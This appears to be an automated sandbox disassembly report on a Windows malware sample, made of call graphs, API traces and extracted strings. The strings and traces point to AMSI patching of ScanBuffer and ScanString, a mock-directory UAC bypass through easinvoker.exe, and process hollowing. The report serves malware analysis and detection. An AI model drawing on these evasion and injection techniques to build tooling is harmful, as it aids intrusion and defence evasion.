calls 52464->52465 52465->52467 52466->52461 52467->52368 52468->52461 52470->52460 52471->52461 52473 2a16fd3 52472->52473 52474 2a16fcc 52472->52474 52475 2a16fe0 52473->52475 52476 2a16fe9 52473->52476 52477 2a1700f SendMessageA 52474->52477 52478 2a16ffe SystemParametersInfoA 52474->52478 52481 2a16fd1 52474->52481 52483 2a16f54 6 API calls 52475->52483 52484 2a16f24 SystemParametersInfoA 52476->52484 52477->52481 52478->52481 52481->52421 52482 2a16ff0 52482->52421 52483->52481 52484->52482 52486 29ed8c3 52485->52486 52487 29ed8e8 52486->52487 52516 29eda78 42 API calls 52486->52516 52487->52425 52490 2a21913 52489->52490 52491 2a2192c LoadCursorA 52490->52491 52493 2a2157b GetKeyboardLayout 52490->52493 52517 2a219b0 52491->52517 52493->52428 52495 29f1fea 52494->52495 52520 29f14f0 52495->52520 52497 29f200c 52497->52432 52499 2a21d3d 52498->52499 52500 2a21d6f SystemParametersInfoA 52499->52500 52501 2a21d82 CreateFontIndirectA 52500->52501 52502 2a21d9a GetStockObject 52500->52502 52530 29f2434 16 API calls 52501->52530 52531 29f2434 16 API calls 52502->52531 52505 2a21d98 52506 2a21dae SystemParametersInfoA 52505->52506 52507 2a21e02 52506->52507 52508 2a21dce CreateFontIndirectA 52506->52508 52534 29f2518 16 API calls 52507->52534 52532 29f2434 16 API calls 52508->52532 52511 2a21e12 GetStockObject 52535 29f2434 16 API calls 52511->52535 52512 2a21de7 CreateFontIndirectA 52533 29f2434 16 API calls 52512->52533 52515 2a21e00 52515->52438 52516->52487 52518 29d2cac 11 API calls 52517->52518 52519 2a219c3 52518->52519 52519->52490 52521 29f150b 52520->52521 52528 29f14d8 EnterCriticalSection 52521->52528 52524 29f1515 52525 29d2cac 11 API calls 52524->52525 52526 29f1572 52524->52526 52525->52526 52529 29f14e4 LeaveCriticalSection 52526->52529 52527 29f15c3 52527->52497 52528->52524 52529->52527 52530->52505 52531->52506 52532->52512 52533->52515 52534->52511 52535->52515 52537 29f7530 52536->52537 52537->52445 52539 29eea68 52538->52539 52540 29eea91 52539->52540 52541 29eea76 UnregisterClassA 52539->52541 52542 29eea87 RegisterClassA 52539->52542 52550 29d738c 52540->52550 52541->52542 52542->52540 52544 29eeabf 52545 29eeadc 52544->52545 52554 29ee97c 52544->52554 52545->52451 52545->52452 52547 29eead3 SetWindowLongA 52547->52545 52548->52451 52549->52455 52557 29d2ffc 52550->52557 52552 29d739f CreateWindowExA 52553 29d73d9 52552->52553 52553->52544 52555 29ee98c VirtualAlloc 52554->52555 52556 29ee9ba 52554->52556 52555->52556 52556->52547 52557->52552 52559 29d159c 52558->52559 52559->52344 52560 29d1d08 52561 29d1d18 52560->52561 52562 29d1da0 52560->52562 52563 29d1d5c 52561->52563 52564 29d1d25 52561->52564 52565 29d1da9 52562->52565 52566 29d1ff4 52562->52566 52570 29d17c0 10 API calls 52563->52570 52567 29d1d30 52564->52567 52608 29d17c0 52564->52608 52569 29d1dc1 52565->52569 52583 29d1ec0 52565->52583 52568 29d2088 52566->52568 52572 29d2048 52566->52572 52573 29d2004 52566->52573 52575 29d1dc8 52569->52575 52580 29d1de4 52569->52580 52584 29d1e98 52569->52584 52591 29d1d73 52570->52591 52577 29d204e 52572->52577 52581 29d17c0 10 API calls 52572->52581 52578 29d17c0 10 API calls 52573->52578 52574 29d1f18 52579 29d17c0 10 API calls 52574->52579 52593 29d1f31 52574->52593 52576 29d1d99 52598 29d201e 52578->52598 52595 29d1fc8 52579->52595 52585 29d1e15 Sleep 52580->52585 52600 29d1e38 52580->52600 52599 29d205d 52581->52599 52582 29d1d55 52583->52574 52588 29d1ef1 Sleep 52583->52588 52583->52593 52586 29d17c0 10 API calls 52584->52586 52589 29d1e2d Sleep 52585->52589 52585->52600 52602 29d1ea1 52586->52602 52587 29d2043 52588->52574 52592 29d1f0b Sleep 52588->52592 52589->52580 52590 29d1d3d 52590->52582 52632 29d1b28 52590->52632 52591->52576 52597 29d1b28 8 API calls 52591->52597 52592->52583 52595->52593 52601 29d1b28 8 API calls 52595->52601 52596 29d1eb9 52597->52576 52598->52587 52603 29d1b28 8 API calls 52598->52603 52599->52587 52604 29d1b28 8 API calls 52599->52604 52605 29d1fec 52601->52605 52602->52596 52606 29d1b28 8 API calls 52602->52606 52603->52587 52607 29d2080 52604->52607 52606->52596 52609 29d17d8 52608->52609 52610 29d1a04 52608->52610 52619 29d1867 Sleep 52609->52619 52622 29d17ea 52609->52622 52611 29d1b1c 52610->52611 52612 29d19d4 52610->52612 52613 29d1b25 52611->52613 52614 29d1720 VirtualAlloc 52611->52614 52618 29d19e3 Sleep 52612->52618 52625 29d1a22 52612->52625 52613->52590 52616 29d175b 52614->52616 52617 29d174b 52614->52617 52615 29d17f9 52615->52590 52616->52590 52649 29d16e0 52617->52649 52623 29d19f9 Sleep 52618->52623 52618->52625 52619->52622 52624 29d1880 Sleep 52619->52624 52621 29d18c8 52630 29d1668 VirtualAlloc 52621->52630 52631 29d18d4 52621->52631 52622->52615 52622->52621 52626 29d18a6 Sleep 52622->52626 52623->52612 52624->52609 52627 29d1668 VirtualAlloc 52625->52627 52629 29d1a40 52625->52629 52626->52621 52628 29d18bc Sleep 52626->52628 52627->52629 52628->52622 52629->52590 52630->52631 52631->52590 52633 29d1b3d 52632->52633 52634 29d1c08 52632->52634 52636 29d1baf Sleep 52633->52636 52637 29d1b43 52633->52637 52635 29d1784 52634->52635 52634->52637 52638 29d1d02 52635->52638 52641 29d16e0 2 API calls 52635->52641 52636->52637 52639 29d1bc9 Sleep 52636->52639 52640 29d1be7 Sleep 52637->52640 52642 29d1b4c 52637->52642 52646 29d1c1d 52637->52646 52638->52582 52639->52633 52643 29d1bfd Sleep 52640->52643 52640->52646 52644 29d1791 VirtualFree 52641->52644 52642->52582 52643->52637 52645 29d17a9 52644->52645 52645->52582 52647 29d1c9c VirtualFree 52646->52647 52648 29d1c40 52646->52648 52647->52582 52648->52582 52650 29d171d 52649->52650 52651 29d16e9 52649->52651 52650->52616 52651->52650 52652 29d16eb Sleep 52651->52652 52653 29d1700 52652->52653 52653->52650 52654 29d1704 Sleep 52653->52654 52654->52651 52655 29ef2a8 52656 29ef2ca 52655->52656 52659 29ef306 52656->52659 52668 29dc148 42 API calls 52656->52668 52658 29ef4d4 52663 29ef566 52658->52663 52670 29ef880 43 API calls 52658->52670 52659->52658 52662 29d56b8 10 API calls 52659->52662 52669 29dfe44 102 API calls 52659->52669 52661 29ef589 52664 29ef5af 52661->52664 52665 29ef59d SysFreeString 52661->52665 52662->52659 52663->52661 52671 29d5694 12 API calls 52663->52671 52665->52664 52665->52665 52668->52659 52669->52659 52670->52663 52671->52663 52672 2a38704 52675 2a2ca40 52672->52675 52676 2a2ca48 52675->52676 52676->52676 54940 29d2f9c QueryPerformanceCounter 52676->54940 52678 2a2ca6a 54943 29d2fc4 52678->54943 52680 2a2ca74 InetIsOffline 52681 2a2ca7e 52680->52681 52682 2a2ca8f 52680->52682 52683 29d47dc 11 API calls 52681->52683 52684 29d47dc 11 API calls 52682->52684 52685 2a2ca8d 52683->52685 52686 2a2ca9e 52684->52686 52685->52686 52687 29d4b0c 11 API calls 52686->52687 52688 2a2cabc 52687->52688 52689 2a2cace 52688->52689 54944 29d4a98 52689->54944 52691 2a2cae7 52692 2a2caef 52691->52692 52693 2a2caf9 52692->52693 54959 29efd38 52693->54959 52696 29d4b0c 11 API calls 52697 2a2cb20 52696->52697 52698 29d4c4c 52697->52698 52699 2a2cb28 52698->52699 52700 2a2cb32 52699->52700 52701 29d4a98 11 API calls 52700->52701 52702 2a2cb4b 52701->52702 52703 2a2cb5d 52702->52703 52704 29efd38 19 API calls 52703->52704 52705 2a2cb66 52704->52705 52706 29d4b0c 11 API calls 52705->52706 52707 2a2cb84 52706->52707 52708 2a2cb8c 52707->52708 52709 2a2cb96 52708->52709 52710 29d4a98 11 API calls 52709->52710 52711 2a2cbaf 52710->52711 52712 2a2cbb7 52711->52712 52713 2a2cbc1 52712->52713 52714 29efd38 19 API calls 52713->52714 52715 2a2cbca 52714->52715 52716 29d4b0c 11 API calls 52715->52716 52717 2a2cbe8 52716->52717 52718 29d4c4c 52717->52718 52719 2a2cbf0 52718->52719 52720 2a2cbfa 52719->52720 52721 29d4a98 11 API calls 52720->52721 52722 2a2cc13 52721->52722 52723 2a2cc25 52722->52723 52724 29efd38 19 API calls 52723->52724 52725 2a2cc2e 52724->52725 52726 29d4b0c 11 API calls 52725->52726 52727 2a2cc4c 52726->52727 52728 2a2cc54 52727->52728 52729 2a2cc5e 52728->52729 52730 29d4a98 11 API calls 52729->52730 52731 2a2cc77 52730->52731 52732 2a2cc89 52731->52732 52733 29efd38 19 API calls 52732->52733 52734 2a2cc92 52733->52734 52735 29d4b0c 11 API calls 52734->52735 52736 2a2ccb0 52735->52736 52737 2a2ccb8 52736->52737 52738 2a2ccc2 52737->52738 52739 29d4a98 11 API calls 52738->52739 52740 2a2ccdb 52739->52740 52741 29d4c4c 52740->52741 52742 2a2cce3 52741->52742 52743 2a2cced 52742->52743 52744 29efd38 19 API calls 52743->52744 52745 2a2ccf6 52744->52745 52746 2a2cd14 52745->52746 52747 29efd38 19 API calls 52746->52747 52748 2a2cd1d 52747->52748 54970 29d4980 52748->54970 54941 29d2fa9 54940->54941 54942 29d2fb4 GetTickCount 54940->54942 54941->52678 54942->52678 54943->52680 54945 29d4afd 54944->54945 54946 29d4a9c 54944->54946 54947 29d47dc 54946->54947 54948 29d4aa4 54946->54948 54952 29d484c 11 API calls 54947->54952 54954 29d47f0 54947->54954 54948->54945 54950 29d4ab3 54948->54950 54953 29d47dc 11 API calls 54948->54953 54949 29d481e 54949->52691 54951 29d484c 11 API calls 54950->54951 54956 29d4acd 54951->54956 54952->54954 54953->54950 54954->54949 54955 29d2cc8 11 API calls 54954->54955 54955->54949 54957 29d47dc 11 API calls 54956->54957 54958 29d4af9 54957->54958 54958->52691 54960 29efd4c 54959->54960 54961 29efd6f LoadLibraryExA 54960->54961 54962 29d4c4c 54961->54962 54963 29efd7d GetModuleHandleA 54962->54963 54964 29d4c4c 54963->54964 54965 29efd90 GetProcAddress GetCurrentProcess NtProtectVirtualMemory 54964->54965 54972 29efd2c 54965->54972 54967 29efdd2 GetCurrentProcess NtWriteVirtualMemory FreeLibrary 54973 29d47ac 54967->54973 54971 29d4986 54970->54971 54971->54971 54972->54967 54975 29d47b2 54973->54975 54974 29d47d8 54974->52696 54975->54974 54976 29d2cc8 11 API calls 54975->54976 54976->54975 54977 29d51e4 54978 29d51f1 54977->54978 54982 29d51f8 54977->54982 54983 29d4f40 54978->54983 54992 29d4f58 54982->54992 54984 29d4f54 54983->54984 54985 29d4f44 SysAllocStringLen 54983->54985 54984->54982 54985->54984 54986 29d4f38 54985->54986 54987 29d4fcb 54986->54987 54988 29d4f68 54986->54988 54991 29d4fbb SysReAllocStringLen 54986->54991 54987->54982 54989 29d4f7c 54988->54989 54990 29d4f6e SysFreeString 54988->54990 54989->54982 54990->54989 54991->54986 54991->54987 54993 29d4f5e SysFreeString 54992->54993 54994 29d4f64 54992->54994 54993->54994 54995 2a2c788 54996 2a2c79f 54995->54996 54997 2a2c7ca RegOpenKeyA 54996->54997 54998 2a2c7d8 54997->54998 55006 29d4ca4 54998->55006 55000 2a2c7f0 55001 2a2c7fd RegSetValueExA RegCloseKey 55000->55001 55002 29d47ac 11 API calls 55001->55002 55003 2a2c82e 55002->55003 55004 29d4788 11 API calls 55003->55004 55005 2a2c836 55004->55005 55007 29d4c58 55006->55007 55008 29d484c 11 API calls 55007->55008 55010 29d4c93 55007->55010 55009 29d4c6f 55008->55009 55009->55010 55011 29d2cc8 11 API calls 55009->55011 55010->55000 55011->55010 55012 2a2bcf8 55013 2a2bd01 55012->55013 55013->55013 55014 29d4b0c 11 API calls 55013->55014 55015 2a2bd43 55014->55015 55016 29d4a98 11 API calls 55015->55016 55017 2a2bd68 55016->55017 55018 29efd38 19 API calls 55017->55018 55019 2a2bd83 55018->55019 55020 29d4b0c 11 API calls 55019->55020 55021 2a2bd9c 55020->55021 55022 29d4a98 11 API calls 55021->55022 55023 2a2bdc1 55022->55023 55024 29efd38 19 API calls 55023->55024 55025 2a2bddc 55024->55025 55026 29d4b0c 11 API calls 55025->55026 55027 2a2bdf5 55026->55027 55028 29d4a98 11 API calls 55027->55028 55029 2a2be1a 55028->55029 55030 29efd38 19 API calls 55029->55030 55031 2a2be35 55030->55031 55032 29d4b0c 11 API calls 55031->55032 55033 2a2be66 55032->55033 55034 29efd38 19 API calls 55033->55034 55035 2a2beb0 55034->55035 55036 29d4b0c 11 API calls 55035->55036 55037 2a2bee7 55036->55037 55038 29d4a98 11 API calls 55037->55038 55039 2a2bf0c 55038->55039 55040 29efd38 19 API calls 55039->55040 55041 2a2bf27 55040->55041 55042 29d4b0c 11 API calls 55041->55042 55043 2a2bf40 55042->55043 55044 29d4a98 11 API calls 55043->55044 55045 2a2bf65 55044->55045 55046 29efd38 19 API calls 55045->55046 55047 2a2bf80 55046->55047 55048 29d4b0c 11 API calls 55047->55048 55049 2a2bf99 55048->55049 55050 29d4a98 11 API calls 55049->55050 55051 2a2bfbe 55050->55051 55052 29efd38 19 API calls 55051->55052 55053 2a2bfd9 55052->55053 55099 29d8eb0 55053->55099 55055 2a2bffe 55056 2a2c056 CreateProcessAsUserW 55055->55056 55057 29d4b0c 11 API calls 55056->55057 55058 2a2c080 55057->55058 55059 29d4a98 11 API calls 55058->55059 55060 2a2c0b1 55059->55060 55061 29efd38 19 API calls 55060->55061 55062 2a2c0d5 55061->55062 55063 29d4b0c 11 API calls 55062->55063 55064 2a2c0f1 55063->55064 55065 29d4a98 11 API calls 55064->55065 55066 2a2c122 55065->55066 55067 29efd38 19 API calls 55066->55067 55068 2a2c146 55067->55068 55069 29d4b0c 11 API calls 55068->55069 55070 2a2c162 55069->55070 55071 29d4a98 11 API calls 55070->55071 55072 2a2c193 55071->55072 55073 29efd38 19 API calls 55072->55073 55074 2a2c1b7 55073->55074 55075 2a2c1c1 55074->55075 55076 2a2c2c6 55074->55076 55078 29d4b0c 11 API calls 55075->55078 55077 29d47ac 11 API calls 55076->55077 55079 2a2c2e3 55077->55079 55083 2a2c1dd 55078->55083 55103 29d4f68 55079->55103 55082 29d47ac 11 API calls 55084 2a2c2fe 55082->55084 55085 29d4a98 11 API calls 55083->55085 55086 29d4f68 SysFreeString 55084->55086 55090 2a2c20e 55085->55090 55087 2a2c306 55086->55087 55088 29d47ac 11 API calls 55087->55088 55089 2a2c313 55088->55089 55091 29efd38 19 API calls 55090->55091 55092 2a2c232 55091->55092 55093 29d4b0c 11 API calls 55092->55093 55094 2a2c24e 55093->55094 55095 29d4a98 11 API calls 55094->55095 55096 2a2c27f 55095->55096 55097 29efd38 19 API calls 55096->55097 55098 2a2c2a3 WaitForSingleObject CloseHandle CloseHandle 55097->55098 55098->55076 55100 29d8ec3 55099->55100 55106 29d4cac 55100->55106 55104 29d4f7c 55103->55104 55105 29d4f6e SysFreeString 55103->55105 55104->55082 55105->55104 55107 29d4cde 55106->55107 55108 29d4cb1 55106->55108 55109 29d4788 11 API calls 55107->55109 55108->55107 55110 29d4cc5 55108->55110 55112 29d4cd4 55109->55112 55111 29d4878 11 API calls 55110->55111 55111->55112 55112->55055 55113 2a2b5fc 55122 29d5228 55113->55122 55115 2a2b60e RtlInitUnicodeString 55131 29d50f8 55115->55131 55119 2a2b655 NtDeleteFile 55120 29d4f68 SysFreeString 55119->55120 55121 2a2b675 55120->55121 55123 29d522e SysAllocStringLen 55122->55123 55124 29d5244 55122->55124 55123->55124 55127 29d4f38 55123->55127 55124->55115 55125 29d4fcb 55125->55115 55126 29d4f68 55128 29d4f7c 55126->55128 55129 29d4f6e SysFreeString 55126->55129 55127->55125 55127->55126 55130 29d4fbb SysReAllocStringLen 55127->55130 55128->55115 55129->55128 55130->55125 55130->55127 55132 29d50fc RtlDosPathNameToNtPathName_U 55131->55132 55133 2a2b5d4 55132->55133 55133->55119
                                                                                                                                            APIs
                                                                                                                                            • InetIsOffline.URL(00000000,00000000,02A37AA9,?,?,?,000002BA,00000000,00000000), ref: 02A2CA75
                                                                                                                                              • Part of subcall function 029EFD38: LoadLibraryExA.KERNEL32(00000000,00000000,00000000,00000000,029EFE14), ref: 029EFD70
                                                                                                                                              • Part of subcall function 029EFD38: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,00000000,00000000,029EFE14), ref: 029EFD7E
                                                                                                                                              • Part of subcall function 029EFD38: GetProcAddress.KERNEL32(74AE0000,00000000), ref: 029EFD97
                                                                                                                                              • Part of subcall function 029EFD38: GetCurrentProcess.KERNEL32(02A6A35C,17D783FC,00000040,00000004,74AE0000,00000000,00000000,00000000,00000000,00000000,00000000,029EFE14), ref: 029EFDB3
                                                                                                                                              • Part of subcall function 029EFD38: NtProtectVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,02A6A35C,17D783FC,00000040,00000004,74AE0000,00000000,00000000,00000000,00000000,00000000,00000000,029EFE14), ref: 029EFDB9
                                                                                                                                              • Part of subcall function 029EFD38: GetCurrentProcess.KERNEL32(02A6A35C,Function_00006ADC,00000004,02A6A360,00000000,02A6A35C,17D783FC,00000040,00000004,74AE0000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 029EFDE3
                                                                                                                                              • Part of subcall function 029EFD38: NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,02A6A35C,Function_00006ADC,00000004,02A6A360,00000000,02A6A35C,17D783FC,00000040,00000004,74AE0000,00000000,00000000,00000000,00000000,00000000), ref: 029EFDE9
                                                                                                                                              • Part of subcall function 029EFD38: FreeLibrary.KERNEL32(74AE0000,00000000,02A6A35C,Function_00006ADC,00000004,02A6A360,00000000,02A6A35C,17D783FC,00000040,00000004,74AE0000,00000000,00000000,00000000,00000000), ref: 029EFDF4
                                                                                                                                              • Part of subcall function 029D8DE0: GetFileAttributesA.KERNEL32(00000000,?,02A2D4C6,ScanString,02A6A350,02A37AE0,OpenSession,02A6A350,02A37AE0,ScanString,02A6A350,02A37AE0,UacScan,02A6A350,02A37AE0,UacInitialize), ref: 029D8DEB
                                                                                                                                              • Part of subcall function 029DD570: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02B5EB38,?,02A2D7E7,ScanBuffer,02A6A350,02A37AE0,OpenSession,02A6A350,02A37AE0,ScanBuffer,02A6A350,02A37AE0,OpenSession), ref: 029DD587
                                                                                                                                              • Part of subcall function 02A2B768: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02A2B838), ref: 02A2B7A3
                                                                                                                                              • Part of subcall function 02A2B768: NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,02A2B838), ref: 02A2B7D3
                                                                                                                                              • Part of subcall function 02A2B768: NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 02A2B7E8
                                                                                                                                              • Part of subcall function 02A2B768: NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 02A2B814
                                                                                                                                              • Part of subcall function 02A2B768: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 02A2B81D
                                                                                                                                              • Part of subcall function 029D8E04: GetFileAttributesA.KERNEL32(00000000,?,02A3062B,ScanString,02A6A350,02A37AE0,OpenSession,02A6A350,02A37AE0,OpenSession,02A6A350,02A37AE0,ScanBuffer,02A6A350,02A37AE0,ScanString), ref: 029D8E0F
                                                                                                                                              • Part of subcall function 029D8FCC: CreateDirectoryA.KERNEL32(00000000,00000000,?,02A306D1,ScanBuffer,02A6A350,02A37AE0,ScanString,02A6A350,02A37AE0,OpenSession,02A6A350,02A37AE0,OpenSession,02A6A350,02A37AE0), ref: 029D8FD9
                                                                                                                                              • Part of subcall function 02A2B684: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02A2B756), ref: 02A2B6C3
                                                                                                                                              • Part of subcall function 02A2B684: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02A2B6FD
                                                                                                                                              • Part of subcall function 02A2B684: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02A2B72A
                                                                                                                                              • Part of subcall function 02A2B684: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02A2B733
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: File$Path$Name$AttributesCloseCreateCurrentLibraryMemoryModuleName_ProcessVirtualWrite$AddressDirectoryFreeHandleInetInformationLoadOfflineOpenProcProtectQueryRead
                                                                                                                                            • String ID: .png$.url$@^@$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Users\Public\Libraries$C:\Windows\SysWOW64$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$C:\\Windows \\System32\\easinvoker.exe$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$DEEX$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FindCertsByIssuer$FlushInstructionCache$GET$HotKey=$I_QueryTagInformation$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$^^Nc$acS$advapi32$bcrypt$can$cmd /c "C:\\Windows \\System32\\easinvoker.exe"$connect$endpointdlp$http$iexpress.exe$kernel32$mssip32$ntdll$psapi$smartscreenps$spp$sppc$sppwmi$wintrust$ws2_32
                                                                                                                                            • API String ID: 2178617691-2902499223
                                                                                                                                            • Opcode ID: e029d27fd75ceca93a1a9a5d02f3bd55dd58020f10478a8f481bd35e78d07125
                                                                                                                                            • Instruction ID: 5f4168cca1ed6d57ab9ec93a0983bf504c8d3527a665a8a23c1cdcbedb67aec8
                                                                                                                                            • Opcode Fuzzy Hash: e029d27fd75ceca93a1a9a5d02f3bd55dd58020f10478a8f481bd35e78d07125
                                                                                                                                            • Instruction Fuzzy Hash: C2F34035A011189BDB15EB64DD80ADEB3BABFC4700F5094E6E509AB610DF30EF869F91
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 4211 29f7e4c-29f7e4f 4212 29f7e54-29f7e59 4211->4212 4212->4212 4213 29f7e5b-29f7ee9 call 29d4c3c call 29d4b0c call 29d4c4c call 29d4980 call 29d4a98 call 29d4c4c call 29d4980 call 29efd38 4212->4213 4230 29f7eef-29f7fca call 29d4b0c call 29d4c4c call 29d4980 call 29d4a98 call 29d4c4c call 29d4980 call 29efd38 call 29d4b0c call 29d4c4c call 29d4980 call 29d4a98 call 29d4c4c call 29d4980 call 29efd38 4213->4230 4231 29f96ad-29f96f5 call 29d47ac * 2 call 29d4f68 call 29d47ac 4213->4231 4230->4231 4268 29f7fd0-29f82e0 call 29d4b0c call 29d4c4c call 29d4980 call 29d4a98 call 29d4c4c call 29d4980 call 29efd38 call 29d4b0c call 29d4c4c call 29d4980 call 29d4a98 call 29d4c4c call 29d4980 call 29efd38 call 29d320c * 2 call 29d4b0c call 29d4c4c call 29d4980 call 29d4a98 call 29d4c4c call 29d4980 call 29efd38 call 29d4b0c call 29d4c4c call 29d4980 call 29d4a98 call 29d4c4c call 29d4980 call 29efd38 call 29d4b0c call 29d4c4c call 29d4980 call 29d4a98 call 29d4c4c call 29d4980 call 29efd38 call 29d4b0c call 29d4c4c call 29d4980 call 29d4a98 call 29d4c4c call 29d4980 call 29efd38 call 29d4b0c call 29d4c4c call 29d4980 call 29d4a98 call 29d4c4c call 29d4980 call 29efd38 call 29d50e8 call 29d50f8 CreateProcessAsUserW 4230->4268 4375 29f8353-29f85d5 call 29d4b0c call 29d4c4c call 29d4980 call 29d4a98 call 29d4c4c call 29d4980 call 29efd38 call 29d4b0c call 29d4c4c call 29d4980 call 29d4a98 call 29d4c4c call 29d4980 call 29efd38 call 29d2f9c call 29d2fc4 call 29d4b0c call 29d4c4c call 29d4980 call 29d4a98 call 29d4c4c call 29d4980 call 29efd38 call 29d4b0c call 29d4c4c call 29d4980 call 29d4a98 call 29d4c4c call 29d4980 call 29efd38 call 29d4b0c call 29d4c4c call 29d4980 call 29d4a98 call 29d4c4c call 29d4980 call 29efd38 GetThreadContext 4268->4375 4376 29f82e2-29f834e call 29d4b0c call 29d4c4c call 29d4980 call 29d4a98 call 29d4c4c call 29d4980 call 29efd38 4268->4376 4375->4231 4464 29f85db-29f883e call 29d4b0c call 29d4c4c call 29d4980 call 29d4a98 call 29d4c4c call 29d4980 call 29efd38 call 29d4b0c call 29d4c4c call 29d4980 call 29d4a98 call 29d4c4c call 29d4980 call 29efd38 call 29d4b0c call 29d4c4c call 29d4980 call 29d4a98 call 29d4c4c call 29d4980 call 29efd38 call 29d4b0c call 29d4c4c call 29d4980 call 29d4a98 call 29d4c4c call 29d4980 call 29efd38 call 29d4b0c call 29d4c4c call 29d4980 call 29d4a98 call 29d4c4c call 29d4980 call 29efd38 NtReadVirtualMemory 4375->4464 4376->4375 4535 29f8b4b-29f8bb7 call 29d4b0c call 29d4c4c call 29d4980 call 29d4a98 call 29d4c4c call 29d4980 call 29efd38 4464->4535 4536 29f8844-29f89ad call 29d4b0c call 29d4c4c call 29d4980 call 29d4a98 call 29d4c4c call 29d4980 call 29efd38 call 29d4b0c call 29d4c4c call 29d4980 call 29d4a98 call 29d4c4c call 29d4980 call 29efd38 call 29d4b0c call 29d4c4c call 29d4980 call 29d4a98 call 29d4c4c call 29d4980 call 29efd38 NtUnmapViewOfSection 4464->4536 4563 29f8bbc-29f8ccb call 29d4b0c call 29d4c4c call 29d4980 call 29d4a98 call 29d4c4c call 29d4980 call 29efd38 call 29d4b0c call 29d4c4c call 29d4980 call 29d4a98 call 29d4c4c call 29d4980 call 29efd38 call 29efb80 4535->4563 4621 29f89af-29f89cb call 29efb80 4536->4621 4622 29f89d7-29f8a43 call 29d4b0c call 29d4c4c call 29d4980 call 29d4a98 call 29d4c4c call 29d4980 call 29efd38 4536->4622 4563->4231 4627 29f8cd1-29f8dca call 29d4b0c call 29d4c4c call 29d4980 call 29d4a98 call 29d4c4c call 29d4980 call 29efd38 call 29d4b0c call 29d4c4c call 29d4980 call 29d4a98 call 29d4c4c call 29d4980 call 29efd38 call 29f7d5c 4563->4627 4628 29f89d0-29f89d5 4621->4628 4631 29f8a48-29f8b3f call 29d4b0c call 29d4c4c call 29d4980 call 29d4a98 call 29d4c4c call 29d4980 call 29efd38 call 29d4b0c call 29d4c4c call 29d4980 call 29d4a98 call 29d4c4c call 29d4980 call 29efd38 call 29efb80 4622->4631 4701 29f8e1e-29f96a8 call 29d4b0c call 29d4c4c call 29d4980 call 29d4a98 call 29d4c4c call 29d4980 call 29efd38 call 29d4b0c call 29d4c4c call 29d4980 call 29d4a98 call 29d4c4c call 29d4980 call 29efd38 call 29d4b0c call 29d4c4c call 29d4980 call 29d4a98 call 29d4c4c call 29d4980 call 29efd38 NtWriteVirtualMemory call 29d4b0c call 29d4c4c call 29d4980 call 29d4a98 call 29d4c4c call 29d4980 call 29efd38 call 29d4b0c call 29d4c4c call 29d4980 call 29d4a98 call 29d4c4c call 29d4980 call 29efd38 call 29d4b0c call 29d4c4c call 29d4980 call 29d4a98 call 29d4c4c call 29d4980 call 29efd38 NtWriteVirtualMemory call 29d4b0c call 29d4c4c 